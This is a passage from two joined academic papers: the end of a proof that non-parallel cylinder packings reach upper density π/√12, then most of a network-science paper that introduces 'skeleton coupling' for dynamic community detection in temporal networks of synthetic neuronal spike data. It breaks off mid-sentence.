generality, we can assume that \(m_{11}>m_{10}\)). For every \(m_{10}\leq k<m_{11}\), and for every \(x\in\Omega_{k}\), take \(x^{\prime}=\frac{1}{1-\varepsilon_{10}}\cdot x\), and let \(\ell_{x^{\prime}}\) be the line that passes through \(x^{\prime}\) and has the same direction vector as \(\ell_{x}\). Note that \(\ell_{x^{\prime}}=\frac{1}{1-\varepsilon_{10}}\cdot\ell_{x}\). Then, take \(m_{11},m_{12}\) which are suitable for \(\varepsilon_{11}\), \(\varepsilon_{12}\) respectively (without loss of generality, we can assume that \(m_{12}>m_{11}\)). For every \(m_{11}\leq k<m_{12}\), and for every \(x\in\Omega_{k}\) take \(x^{\prime}=\frac{1}{1-\varepsilon_{11}}\cdot x\), let \(\ell_{x^{\prime}}\) be the line that passes through \(x^{\prime}\) and has the same direction vector as \(\ell_{x}\). Again, note that that \(\ell_{x^{\prime}}=\frac{1}{1-\varepsilon_{11}}\cdot\ell_{x}\). Then take \(m_{12},m_{13}\) which are suitable for \(\varepsilon_{12}\), \(\varepsilon_{13}\), and so on. Again, we don't affect the density of the set of the points that we choose. Now consider the collection \(\mathcal{C}\) of all the cylinders of radius \(\frac{1}{2}\) and with axes of the form \(\ell_{x^{\prime}}\). We claim that this collection is a cylinder packing Indeed, 1. If \(x_{1},x_{2}\in\Omega_{k}\) for some \(k\in\mathbb{N}\), then, by theorem 3.6, \(\mathrm{dist}(\ell_{x^{\prime}_{1}},\ell_{x^{\prime}_{2}})\geq 1\). 2. If \(x_{1}\in\Omega_{k_{1}}\) and \(x_{2}\in\Omega_{k_{2}}\) with \(k_{1}\neq k_{2}\), then \[\mathrm{dist}(\ell_{x^{\prime}_{1}},\ell_{x^{\prime}_{2}})= \mathrm{dist}(\frac{1}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\frac{1}{1- \varepsilon_{k_{2}}}\ell_{x_{2}})\] \[=\mathrm{dist}(\frac{1}{1-\varepsilon_{k_{2}}}\cdot\frac{1- \varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\frac{1}{1-\varepsilon _{k_{2}}}\ell_{x_{2}})=\frac{1}{1-\varepsilon_{k_{2}}}\mathrm{dist}(\frac{1- \varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}\ell_{x_{1}},\ell_{x_{2}})\] \[\geq\mathrm{dist}(\ell_{x_{1}},\ell_{x_{2}})-\left|\frac{1- \varepsilon_{k_{2}}}{1-\varepsilon_{k_{1}}}-1\right|d_{1}\geq 0.9d_{1}-0.2d_{1}=0.7d_{1}\geq 1.\] So the collection \(\mathcal{C}\) is a cylinder packing, and by lemma 3.1 it is non-parallel cylinder packing. By lemma 2.3 it's upper density is at least \(\frac{\pi}{4}\cdot\mathrm{density}(\mathscr{L})\). **Corollary 3.9**.: _There exist a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\)._ Proof.: If we take \(\mathscr{L}\) to be the hexagonal lattice, then we get that there exist a cylinder packing C such that on the one hand, \(\delta^{+}(\mathcal{C})\geq\frac{\pi}{\sqrt{12}}\), and on the other hand (see [2]), \(\delta^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\). Thus, \(\delta^{+}(\mathcal{C})=\frac{\pi}{\sqrt{12}}\), as desired. ## 4 Conclusions and directions for future study In this paper we showed that the maximal value of \(\delta^{+}\) and \((\delta^{*})^{+}\) for non-parallel cylinder packing is \(\frac{\pi}{\sqrt{12}}\), and for every \(\varepsilon>0\) there exist a non-parallel cylinder packing, \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})>\frac{\pi}{6}-\varepsilon\). One interesting question is what is the maximal value of \(\delta^{-}\) for non-parallel cylinder packing(or supremum if maximum does not exist) and whether we can achieve the bound of \(\frac{\pi}{\sqrt{12}}\). Another interesting question is whether a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) exists, with \((\delta^{*})^{-}(\mathcal{C})>0\). **Acknowledgments** This paper is based on my M.Sc thesis at Tel Aviv University under the supervision of Prof. Barak Weiss. I am deeply grateful to Prof. Barak Weiss, whose experience and guidance have enriched me. His insights and advice were indispensable for this work. I would also like to thank to Andrei Lacob for dedicating his time to review this work and provide helpful comments. This research was supported by the Israel Science Foundation 2919/19.
2301.10860
Skeleton coupling: a novel interlayer mapping of community evolution in temporal networks
Dynamic community detection (DCD) in temporal networks is a complicated task that involves the selection of a method and its associated hyperparameters. How to choose the most appropriate method generally depends on the type of network being analyzed and the specific properties of the data that define the network. In functional temporal networks derived from neuronal spike train data, communities are expected to be transient, and it is common for the network to contain multiple singleton communities. Here, we compare the performance of different DCD methods on functional temporal networks built from synthetic neuronal time series data with known community structure. We find that, for these networks, DCD methods that utilize interlayer links to perform community carryover between layers outperform other methods. However, we also observe that DCD performance is highly dependent on the topology of interlayer links, especially in the presence of singleton and transient communities. We therefore define a novel way of defining interlayer links in temporal networks called skeleton coupling that is specifically designed to enhance the linkage of communities in the network throughout time based on the topological properties of the community history. We show that integrating skeleton coupling with current DCD methods improves the method's performance in synthetic data with planted singleton and transient communities. The use of skeleton coupling to perform DCD will therefore allow for more accurate and interpretable results of community evolution in real-world neuronal data or in other systems with transient structure and singleton communities.
Bengier Ülgen Kilic, Sarah Feldt Muldoon
2023-01-25T22:46:42Z
http://arxiv.org/abs/2301.10860v2
# Skeleton coupling: a novel interlayer mapping of community evolution in temporal networks ###### Abstract Dynamic community detection (DCD) in temporal networks is a complicated task that involves the selection of an algorithm and its associated parameters. How to choose the most appropriate algorithm generally depends on the type of network being analyzed and the specific properties of the data that define the network. In functional temporal networks derived from neuronal spike train data, communities are expected to be transient, and it is common for the network to contain multiple singleton communities. Here, we compare the performance of different DCD algorithms on functional temporal networks built from synthetic neuronal time series data with known community structure. We find that, for these networks, DCD algorithms that utilize interlayer links to perform community carryover between layers outperform other methods. However, we also observe that algorithm performance is highly dependent on the topology of interlayer links, especially in the presence of singleton and transient communities. We therefore define a novel method for defining interlayer links in temporal networks called skeleton coupling that is specifically designed to enhance the linkage of communities in the network throughout time based on the topological properties of the community history. We show that integrating skeleton coupling with current DCD methods improves algorithm performance in synthetic data with planted singleton and transient communities. The use of skeleton coupling to perform DCD will therefore allow for more accurate and interpretable results of community evolution in real-world neuronal data or in other systems with transient structure and singleton communities. Introduction Complex systems are often composed of elements whose dynamics and interactions can change over time. Such temporal events might describe human communication [1], proximity [2; 3; 4], trade and transportation [5; 6], citation and collaboration [7; 8], or biological [9; 10] and neuronal interactions [11; 12]. Modeling these systems as temporal networks [13; 14] can be useful, as network nodes and edges can capture temporal properties of the data. This is particularly relevant for systems with nodes whose dynamics can be represented using time series data. Neuronal systems are a prime example of a dynamic system that can be modeled as a temporal network. For example, spike train data describes the simultaneous firing patterns of neurons over time. Thus, one can build a network whose nodes are neurons and whose edges represent statistical relationships (such as synchronization or some other similarity measure) between the firing patterns of neurons. In order to capture the fact that interactions between pairs of neurons will change over time, a common way of building a temporal network with this data is to create sequential snapshots of the network over time that describe the dynamic evolution of the data. To do this, one can split the time series into smaller time series, construct chronologically ordered set of network states, and try to characterize the intrinsic patterns of connectivity across those individual snapshots (Fig.1A). One aspect of temporal networks that is often of interest to study is the dynamic properties of communities within the network over time. In our example of neuronal firing, communities could represent synchronized groups of neurons, and we could ask how the membership of such groups changes over time. Multiple dynamic community detection (DCD) algorithms have been developed that extend static community detection to temporal networks, where now communities can exist (and be created/die) across time [15]. However, similar to the case of static networks, each DCD algorithm is based on a slightly different definition of how communities are detected within the network. Further, DCD algorithms must also include a definition of how to properly carry-over or assign community labels across snapshots (layers of the network). As a result, DCD algorithms in the literature vary greatly depending on their treatment of the snapshots and their temporal dependence [16]. Some algorithms treat individual snapshots separately, others might iterate over the snapshots in chronological order, and some might use interlayer edges to link the snapshots over time into a temporally connected network. Here, we focus on five commonly used DCD algorithms that span the different ways of defining dynamic communities: Multilayer modularity maximization (MMM) [17], Infomap [18; 19], Dynamic stochastic block model (DSBM) [20; 21], Dynamic plex propagation method (DPPM) [22], and Tensor Factorization [23]. MMM and DSBM define a community as a densely connected cluster of nodes with respect to a null model, whereas Infomap defines a community as a group of nodes in which information flows quickly and efficiently. DPPM utilizes a definition in which communities are groups of subsets (plexes) of fully connected subgraphs (cliques) that have maximal overlap. Finally, Tensor Factorization takes an approach from linear algebra and defines the communities as the bases of a vector space generating the underlying network. This variance in the definitions of a dynamic community forces these algorithms to make specific assumptions about how to temporally carry-over community labels across snapshots (layers) (Fig.1B). Algorithms like MMM and Infomap operate on the idea that temporal carry-over is performed through the structural multilayer network topology; in this case 'interlayer edges' are defined that link nodes across layers, such that communities can naturally exist across time. However, the other three algorithms use 'fixed rules' to define temporal carry-over that ignore data-specific differences. DSBM uses a fixed generative model for the temporal network in which communities are created and transferred across time via a Bayesian method. DPPM uses a fixed algorithm in which plexes in static layers are carried over across time if they intersect sufficiently between snapshots. Finally, Tensor Factorization utilizes a fixed factorization technique (PARAFAC) that splits the 3-way tensor into simpler matrices in which the time component of the factorization corresponds to the temporal carry-over. Importantly, because of the different ways in which each algorithm defines a community, both statically and dynamically, different algorithms will emphasize different features of the data and therefore will detect different patterns of dynamic communities. It is therefore essential to have an understanding of how each algorithm detects the specific features of the data and incorporates this information into the detected communities. This is especially relevant in order to interpret any results when these algorithms are applied to experimental data sets where the underlying ground truth is not known. Motivated by our example from neuroscience, here we are especially interested in how various DCD algorithms perform to detect data with a high presence of singleton communities (independently firing neurons) and transient communities (cell assemblies that change over time with the state of the brain). We therefore simulate spike train data with known community structure and test the performance of DCD algorithms on this data. As expected, we find that different algorithms detect different patterns of dynamic community structure for the same data set. Algorithms that incorporate interlayer edges to link snapshots over time perform better at detecting singleton and transient communities in our simulated data, but all algorithms struggle to correctly perform temporal carry-over of community labels. We find that the topology of how interlayer links are defined in these temporal networks can greatly influence the performance of the algorithm. The most common method of interlayer coupling, called diagonal coupling, in which network nodes are linked to themselves in sequential layers, performs poorly at properly assigning the carry-over of community labels in our data. However, we find that by utilizing information about the _intralayer_ topology of each individual layer in the network to couple the layers, one can improve algorithm performance. Using methods from topological data analysis (TDA), a field in the intersection of data science and algebraic topology in mathematics [24; 25; 26; 27], we define a novel interlayer coupling method called skeleton coupling that defines interlayer edges based on the community information within the static layers of temporal networks. Skeleton coupling takes the temporal neighborhood history and community assignment of a vertex (in the adjacent past state) into account such that DCD algorithms robustly and correctly capture the temporal carry-over of both singleton communities and larger assemblies. We compare our results for skeleton coupling with previously proposed mechanisms of interlayer coupling and show that skeleton coupling outperforms other methods on data with a high prevalence of singleton and transient communities. ## II Simulation of neuronal data As previously mentioned, this work is motivated by applications for studying temporal functional networks built from firing patterns of individual neurons. However, because in such data the ground truth of community evolution cannot be known, here we apply our analysis to synthetic data. Although previous work studying community evolution has designed benchmark networks for testing community detection in evolving networks [28; 29; 30; 31], the links in these networks represent structural (as opposed to functional) connections between nodes. As such, these benchmark models do not generally contain singleton communities or highly transient communities as commonly seen in functional networks based on correlation data [32; 33; 34]. We therefore designed a set of functional benchmark networks built from correlations between simulated neuronal spike trains. In our numerical experiments, we study two different types of community events expected to be present in dynamic functional networks: monotonic and non-monotonic events. Monotonic events correspond to the scenarios where a graph progressively evolves over time such that communities in one layer are nested into the the communities in an adjacent layer. Such events include community expansion, shrinkage, or continuation. Non-monotonic evens represent the scenarios in which communities in adjacent layer can partially overlap (as in Fig.1A), but these communities do not necessarily contain each other. Examples of non-monotonic events include community merging, splitting, death, and birth. In each of these scenarios, it is necessary to properly determine how the community labels should evolve over time, as depending on the properties of the data (such as neuronal firing pattern or rate), one might want to either define a new community, or carryover a previous label (see Fig. 1(B-C)). Here, we focus on examples of a monotonic event (an expanding community) and a non-monotonic event (multiple transient communities). Community structure is modeled using simulated neuronal spiking activity with built-in correlations between firing patterns of individual neurons within a given community. In addition, the community structure (correlated firing of Figure 1: **From time-series to dynamic community analysis A.** A synthetic time-series from \(N=78\) neurons generated via homogeneous Poisson process which contains planted communities undergoing community events at every \(\tau=1000\)ms. The data is divided into 1000ms windows and six functional network snapshots representing the co-activity of neurons are constructed by calculating the maximum cross-correlation between pairs of spike trains. **B.** A two-snapshot dynamic network in which temporal carryovers are performed via either _interlayer edges_ by MMM and Infomap (left) or by some _fixed rule_ by DSBM, DPPM and Tensor Factorization (right). **C.** Three different scenarios for the community events taking place in part B. On the left, two planted communities in \(t\) ‘merge’ so that the resulting community in \(t+1\) has a new community label. In the middle, planted community I ’grows’ by joining with planted community II, and the resulting community has the same label as I. On the right, planted community II ’grows’ by joining with planted community I, and the resulting community gets the label II. Different DCD algorithms handle these types of carryovers differently. neurons) is allowed to dynamically evolve through a series of community events. Importantly, in this data, multiple neurons have independent firing patterns, such that many singleton communities are present in the data. In order to map this data to a temporal network, the time series is first divided into multiple windows, each representing a layer of the network. Functional network structure in each layer is obtained by computing the absolute value of the pairwise maximum cross-correlation between firing patterns of neurons over the window. Because the use of cross-correlations to define functional network connections results in a fully connected network with many small edge weight values that likely represent noise in the data, for each data set, we create a set of temporal networks in which a threshold is used to eliminate connections with edge weights below the threshold value. In the following section, all results are presented across a range of threshold values (shown along the x-axis in the parameter space maps of Figs. 2, 5, and 6). Please see Methods for further details of synthetic data generation and network creation. ## III Comparison of Dcd algorithm performance We compare the performance of 5 different DCD algorithms (MMM [17], Infomap [35], DSBM [20], DPPM [22] and Tensor Factorization [23]) on two different community evolution scenarios as described above (expanding and transient communities). We include a range of algorithm specific hyperparameters (resolution parameter \(\gamma\), multilayer relax rate \(\rho\), degree correction \(\Delta\), k-plex dimension \(k\), and input tensor rank \(\eta\), respectively) as the y-axes of parameter space maps for these 5 algorithms. In the left panels of Fig.2A and Fig.2B, we display the ground truth of the community evolution of planted dynamic communities. We then plot the parameter space describing the performance of the algorithm as a function of the normalized mutual information (NMI) [36; 37] with respect to the ground truth (See Methods Section 'Evaluating partition quality'). In these plots, the parameter values representing the optimal performance of each algorithm are indicated by the region bounded by the green rectangle (See Methods Section 'Optimal regions'). An example of the community evolution in this optimal regime is shown below the parameter space plot. In Fig. 2(A), we present the performance of the 5 DCD algorithms to detect the community evolution of an expanding community event. Neurons first exist as singleton communities (firing patterns are uncorrelated with others) and join a growing correlated community as time advances (series of monotonic events). As seen in the NMI parameter landscapes, each algorithm varies in its ability to correctly detect this pattern of community evolution. Example community evolution plots and respective parameters are shown for the optimal algorithm performance below these plots. It can be observed that the MMM and Infomap algorithms perform the best at detecting singleton communities and performing temporal carryover; these algorithms also produce the highest NMI values (darker shade of red) over a wider range of parameters. Still, MMM fails to properly detect the expanding community, whereas Infomap partially detects this growing community, albeit with some noise. DSBM and DPPM, on the other hand, yield relatively low NMI and result in the detection of 2 total communities, as they do not properly distinguish the singleton communities and instead lump all uncorrelated neurons into a single community. Tensor Factorization performs somewhere in-between these extremes and detects most of the communities in individual layers separately, failing to properly perform temporal carryover. We next compare the performance of the algorithms on data containing transient and singleton communities (non-monotonic events; Fig. 2B). Again, we observe that MMM and Infomap perform the best as measured by the NMI, but the optimal community partitions shows that they are detecting rather different patterns of community evolution. Both algorithms are able to detect singleton communities and perform temporal carryover on the singleton communities. MMM additionally, detects some of the transient larger communities, but fails to perform temporal carryover between layers for these transient communities. Tensor Factorization can also detect the transient communities in addition to singleton communities but completely fails at performing temporal carryover of community layers. Once again, DSBM and DPPM only detect two communities which does not reflect the planted structure and is apparent in their low NMI values. It is notable that in each of the scenarios studied, the DSBM and DPPM algorithms were unable to detect the presence of singleton communities in the data. Further, Tensor Factorization consistently failed to perform temporal carryover of detected communities. While MMM and Infomap did not always perform the temporal carryover correctly, they were able to identify singleton communities, and importantly, these algorithms rely on interlayer edges to link layers across time. In the data presented above, for the MMM and Infomap algorithms, the standard technique of diagonal coupling was used, as this is the most commonly employed method of coupling. However, this is another parameter that can be tweaked when using these algorithms, and for the remainder of this paper, we will focus on the use of different methods of interlayer coupling to further improve community detection in the MMM and Infomap algorithms. ## IV Traditional interlayer coupling When employing the MMM and Infomap algorithms in a temporal network, the network must be constructed by using interlayer edges that describe how nodes are linked across layers (and therefore across time). Here we review some standard and recently proposed methods for defining interlayer links in temporal networks. Let \(\mathsf{T}=(V,E)\) be a node-aligned temporal network with snapshot representation \(\mathsf{T}=\{\mathsf{G}_{1},\mathsf{G}_{2},...\mathsf{G}_{t_{max}}\}\). We'll denote the node \(\sigma_{\alpha}\) in the layer \(\mathsf{G}_{t}\) by \(\sigma_{\alpha}^{t}\) and an undirected edge from \(\sigma_{\alpha}^{t}\) to another node \(\sigma_{\beta}^{s}\) by \((\sigma_{\alpha}^{t},\sigma_{\beta}^{s})\). ### Diagonal coupling The most common way of constructing interlayer edges is to use diagonal coupling. In this case, each node of the network is coupled with its temporal counterpart in a regular fashion as in Fig.3A. Thus, there exists an interlayer edge \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\) for all \(\alpha\) and for all \(t\in\{1,2,..,t_{max}-1\}\) with edge weight \(\omega\), where \(\omega\) is constant across all edges, but its value must be specified by the user. Here, \(\omega\) can be thought of as a self-identity link that preserves the identity of the node throughout time. We will refer to this method of coupling as _uniform diagonal coupling_. While this method of coupling will allow for a node to maintain its identity throughout the network, it does not capture the fact that in many networks, the nodes represent dynamic entities whose properties change throughout time. A question one may ask is if changing the values of the interlayer edge weights (i.e., allowing for \(\omega\) to vary across nodes and layers) would make a difference in the detection of dynamic communities. Each diagonal interlayer edge is a link from a node to its future or past self, so in this sense, these links indicate the strength of temporal self-similarity of nodes. In our simulated data, the nodes are in fact neurons whose firing rates and patterns can evolve, thus a nodes self-similarity over time is not necessarily constant. Previous work [38] has described a method that allows for the value of \(\omega\) to change based on the level of nodal self-similarity. The greater the change in the self-similarity of a node is between snapshots (e.g. the firing rate of the neuron), the weaker the nodes interlayer Figure 2: **Comparing DCD algorithms on simulated time series.** A comparison of algorithm performance across parameter spaces and _example partitions_ for the optimal regions of five different DCD algorithms: MMM, Infomap, DSBM, DPPH and Tensor Factorization. Algorithm performance is explored as a function of the edge threshold, \(T\), and an algorithm-specific parameter (resolution parameter \(\gamma\), multilayer relax rate \(\rho\), degree correction \(\Delta\), k-plex size \(k\) and tensor rank \(\eta\), respectively) by plotting the normalized mutual information (NMI) between the ‘ground truth’ community labels (left panel) and predicted labels. The optimal region is defined as the parameter values \((T,\cdot)\) in which NMI is maximized, and an _example partition_ from this region is shown under each parameter grid. Partition plots represent the community evolution across six snapshots (network layers) and the colors indicate the community label of each neuron at each point in time. **A.** Dynamics of \(N=78\) spiking neurons are simulated such that a large community keeps expanding by merging with singleton communities at every layer (monotonic event). There are 67 community labels in total during the ground truth community evolution. **B.** Dynamics of \(N=78\) spiking neurons are simulated such that synchronized groups of neurons appear and disappear over time i.e. _transient communities_, and neurons that are not part of any community are assigned a unique community label (indicated by colors) that is temporally carried over unless a neuron undergoes a community event. A total of 122 community labels are produced during this event as shown in the ground truth partition plot. edge weight is between the corresponding temporal layers. We refer to this method as _diagonal coupling with local updates_ and, mathematically, we assign an interlayer edge between \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\) for all \(\alpha\) and for all \(t\in\{1,2,..,t_{max}-1\}\) with edge weight \(\omega_{\alpha}^{t}\) depending on the spike rate change in node \(\sigma_{\alpha}\) from \(\mathsf{G}_{t}\) to \(\mathsf{G}_{t+1}\). See the Methods Section 'Interlayer coupling' for details. ### Non-diagonal coupling While diagonal coupling only allows for a link between a node and itself across layers of the network, it is also completely reasonable to relax this restriction and allow links between some or all pairs of nodes, which introduces a new dimension of complexity and increases the size of the parameter space enormously. While there are multiple ways that one could perform a non-diagonal coupling scheme, here we highlight one previously proposed method called _neighborhood coupling_[39], that connects a maximal neighborhood around every node with the adjacent layers (Fig.3B). Mathematically, we assign interlayer edges of constant weight \(\omega\) from \(\sigma_{\alpha}^{t}\) to a set \(\{\sigma_{\beta}^{t+1}\}_{\beta\in\mathsf{N}_{\alpha}^{t}}\) such that \(\sigma_{\beta}\) is in the maximal neighborhood of \(\sigma_{\alpha}^{t}\) in terms of edge weight (strongly connected neighbors of \(\sigma_{\alpha}\) in \(\mathsf{G}_{t}\)) where \(\mathsf{N}_{\alpha}^{t}=\{\sigma_{\beta}^{t}|(\sigma_{\beta}^{t},\sigma_{ \alpha}^{t})\in E_{t}\}\). See the Methods Section 'Interlayer coupling' for details. This method of coupling is based on the assumption that the topology of the network in its previous state affects how the network evolves. Note that this method also results in a more dense coupling than that of diagonal coupling as seen in Fig. 3B. ## V Skeleton coupling While neighborhood coupling has the advantage of incorporating the topology of the current state of the network into the coupling between layers, this approach does not directly address our desire to improve community carryover between layers, as the neighborhood of a node is distinct from its community assignment within that layer. We therefore propose a novel method of non-diagonal coupling that we call _skeleton coupling_ that is designed to link network layers based on the static community structure within layers, therefore promoting the correct temporal carryover of community labels. The main idea of skeleton coupling is to assign interlayer links to a node either sparsely or densely depending on its temporal neighborhood history creating temporal channels between snapshots. Moreover, by definition of a dynamic community, interlayer coupling links should only exist between the temporally carried over communities because these links are directional maps (due to the asymmetric nature of time), mapping a previous state of the system into a future state. We therefore start by finding the static communities in every snapshot (network layer) in order to determine the domain and range of these maps. This step could be performed using any static community detection method, although here we use the same static version of the DCD algorithm applied later (Fig.4B). Once all of the static community partitions have been determined for a temporal network \(\mathsf{T}\), for a snapshot \(\mathsf{G}_{t}\), we can write \(\mathsf{P}_{t}=\{C_{1},C_{2},...,C_{p}\}\) for all \(t\), where \(C_{i}\) consists of nodes, \(\sigma_{\alpha}^{t}\), of the network belonging to the community \(C_{i}\). We can then define the \(k\)-skeleton of each community in \(\mathsf{P}_{t}\) in the static layer \(\mathsf{G}_{t}\) as a simplicial complex \(\{\mathsf{SC}^{k}\}_{C_{i}}^{t}\). For now, we will focus on the case \(k\leq 1\) for computational simplicity. Each \(1\)-skeleton describes the nodes of the community and the unweighted Figure 3: **Types of interlayer coupling heuristics.****A.** Diagonal coupling. Nodes are only allowed to be connected to their past and future self with a uniform edge weight (uniform coupling). A modification to this (local updates) can be done by dynamically altering the edge weights based on a self-similarity metric of the node from time \(t\) to \(t+1\). **B.** Non-diagonal coupling. Interlayer coupling can exist between any pair of nodes. In the example, we illustrate neighborhood coupling which connects neighborhoods of every node with the adjacent layer. edges (1-simplex) fully-connecting them, i.e., \(\{\mathsf{SC}^{1}\}_{C_{i}}^{t}=\{(\sigma_{\alpha}^{t},\sigma_{\beta}^{t})| \sigma_{\alpha}^{t},\sigma_{\beta}^{t}\in C_{i}\}\). Thus, a skeleton of the community \(C_{i}\) of size \(k\) is the \(k\)-clique consisting of the nodes whose community label, belonging to \(C_{i}\), will be temporally carried over (or not) to the next snapshot (Fig. 4A). One important observation here is that singleton communities can only have a 0-skeleton, \(\{\mathsf{SC}^{0}\}_{C_{i_{0}}}^{t}=\{\sigma_{\alpha}^{t}|\sigma_{\alpha}^{t} \in C_{i_{0}}\}\), since \(|C_{i_{0}}|=1\) and a \(1\)-clique is nothing but a vertex with no edges. For any node \(\sigma_{\alpha}^{t}\) in layer \(\mathsf{G}_{t}\), there are then two possibilities: 1) \(\sigma_{\alpha}^{t}\) can belong to a community of size greater than or equal to 2 ( \(|C_{\alpha}|\geq 2\) and \(\sigma_{\alpha}^{t}\) is part of a 1-skeleton \(\{\mathsf{SC}^{1}\}_{C_{\alpha}}^{t}\)), or 2) it can be a singleton community (\(|C_{\alpha}|=1\) and \(\sigma_{\alpha}^{t}\) has a 0-skeleton \(\{\mathsf{SC}^{0}\}_{C_{\alpha}}^{t}\)). Next, we look at \(\sigma_{\alpha}^{t}\)'s counterpart in the layer \(\mathsf{G}_{t+1}\) to see if \(\sigma_{\alpha}^{t+1}\) is part of a 0 or 1-skeleton. In order to determine how to design the interlayer coupling, we then consider all \(4\) possibilities of combinations between the skeletons of \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\): **case i:**: \(\sigma_{\alpha}^{t}\) _and \(\sigma_{\alpha}^{t+1}\) are both 0-skeletons:_ We assign an undirected interlayer edge \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\) with uniform edge weight \(\omega\) (i.e. we diagonally couple 0-skeletons). This situation, in general, describes the continuation of community label that is maintained by the same singleton over time. This is seen in Fig. 4C, where \(\sigma_{\gamma}^{t}\) and \(\sigma_{\gamma}^{t+1}\) are both 0-skeletons (\(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t}\) and \(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t+1}\), respectively)- there is only one self-identity link \((\sigma_{\gamma}^{t},\sigma_{\gamma}^{t+1})\) between them. Similarly, \(\sigma_{6}^{t+1}\) and \(\sigma_{6}^{t+2}\) are also linked by a single self-identity edge. **case ii:**: \(\sigma_{\alpha}^{t}\) _is a 0-skeleton and \(\sigma_{\alpha}^{t+1}\) is part of a 1-skeleton:_ In this case, we do not assign any interlayer edges from \(\sigma_{\alpha}^{t}\) to the next snapshot \(\mathsf{G}_{t+1}\) since we don't want a singleton community label to persist when the singleton node joins a larger community. For example, in Fig.4C, observe that \(\sigma_{\gamma}^{t+1}\) is a 0-skeleton (\(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t+1}\)), but \(\sigma_{\gamma}^{t+2}\) is part of a 1-skeleton (\(\{\mathsf{SC}^{1}\}_{\{7,8,9\}}^{t+2}\)). We therefore did not assign any interlayer links associated with this node between the two snapshots, as Figure 4: **Skeleton coupling.****A.** Skeletons of given sets (denoted by color) with different numbers of nodes. If the set has size larger than 1, we utilize the associated 1-skeleton whereas if the sets have size equal to 1, they can only have 0-skeletons. **B.** Schematic of our proposed skeleton coupling framework for determining non-empirical interlayer edges in dynamic community detection. Static community detection is performed on individual layers to find the communities in each layer (indicated by colors). Interlayer edges are then assigned via skeleton coupling, and dynamic community detection is applied to the resulting temporal network. **C.** The set matching algorithm performed by skeleton coupling on a toy network. From left to right, each column represents the skeletons of the communities within the static layers \(\mathsf{G}_{t}\), \(\mathsf{G}_{t+1}\) and \(\mathsf{G}_{t+2}\) shown in B. Solid arrows indicate interlayer edge assignments, whereas dashed arrows indicate no interlayer coupling. Colors of the arrows indicate the community label to be carried over to the next snapshot. In order to determine the interlayer edges between layers \(\mathsf{G}_{t}\) and \(\mathsf{G}_{t+1}\), we compare the skeletons that vertices constitute. See the text for descriptions of interlayer edges between layers. indicated by the dashed arrow in the figure. **case iii:**: \(\sigma_{\alpha}^{t}\) _is part of a 1-skeleton and \(\sigma_{\alpha}^{t+1}\) is a 0-skeleton:_ This case is the time-reversed version of _case ii_. We do not assign any interlayer edges from the node \(\sigma_{\alpha}^{t}\) in the time step G\({}_{t+1}\) since this case describes a community shrinking and splitting, and we don't want the community label of the node \(\sigma_{\alpha}^{t}\) to be carried over to the next time step. Note in Fig.4**C**, for example, that \(\sigma_{6}^{t}\) is part of a 1-skeleton (\(\{\mathsf{SC}^{1}\}_{\{6,8,9\}}^{t}\)) and \(\sigma_{6}^{t+1}\) is a 0-skeleton (\(\{\mathsf{SC}^{0}\}_{\{6\}}^{t+1}\). ). We therefore did not assign any interlayer links associated with this node between the two snapshots, as indicated by the dashed arrow in the figure. **case iv:**: \(\sigma_{\alpha}^{t}\) _and \(\sigma_{\alpha}^{t+1}\) are both parts of 1-skeletons:_ We assign interlayer edges of uniform strength \(\omega\) from every node with which \(\sigma_{\alpha}^{t}\) shares a community \(C_{\alpha^{t}}\) to every other node with which \(\sigma_{\alpha}^{t+1}\) shares a community \(C_{\alpha^{t+1}}\) in the snapshot G\({}_{t+1}\). Depending on the sizes of the communities that \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\) are part of, this situation can describe multiple types of community events. Regardless, we want the community label to persist over time. In Fig.4**C**, notice for example, \(\sigma_{3}^{t}\) and \(\sigma_{3}^{t+1}\) belong to communities of size larger than 1 \(C_{3^{t}}=\{\sigma_{2}^{t},\sigma_{3}^{t},\sigma_{5}^{t}\}\) and \(C_{3^{t+1}}=\{\sigma_{1}^{t+1},\sigma_{2}^{t+1},\sigma_{3}^{t+1},\sigma_{4}^{ t+1},\sigma_{5}^{t+1}\}\) (and the corresponding simplicial complexes \(\{\mathsf{SC}^{1}\}_{\{2,3,5\}}^{t}\) and \(\{\mathsf{SC}^{1}\}_{\{1,2,3,4,5\}}^{t+1}\), respectively). This implies we add interlayer edges from \(\sigma_{3}^{t}\) to \(C_{3^{t+1}}\). If we look at other elements of \(C_{3^{t}}\), \(\sigma_{2}^{t}\)&\(\sigma_{5}^{t}\) and their counterparts in the next layer \(\sigma_{2}^{t+1}\)&\(\sigma_{5}^{t+1}\), we see a similar scenario, and therefore, we add links from all the nodes of the community \(C_{3^{t}}\) to all of the nodes of \(C_{3^{t+1}}\), building a temporal bridge between them. Skeleton coupling thus serves as a finely tuned coupling strategy based on the topological difference between singletons and larger communities in the time-varying network. Here, we use the terminology of a 'k-skeleton' from topological data analysis (TDA) references added [24; 25; 26; 27] because we claim that the definition of a dynamic community in functional networks is in the form of \(k\)-plexes [22]. In a perfect world of noiseless data, a community of \(n\) nodes should be an \(n\)-clique, whereas in reality, a dynamic community is a set of nodes that has missing or noisy links. We therefore rely on the simplicial complex definition and usage of skeletons to account for real-world data in which true cliques are unlikely to be present within communities. We also provide a pseudo-code of the implementation of skeleton coupling in Supplementary Material 'Skeleton coupling algorithm'. ## VI Applications of skeleton coupling to temporal network analysis In Section III, we showed that the MMM and Infomap algorithms were capable of detecting singleton communities within the data, but performed poorly in carrying over the correct community labels. In these previous comparisons, we focused on the effect of the resolution parameter, \(\gamma\), (MMM) and the multilayer relax rate, \(\rho\), 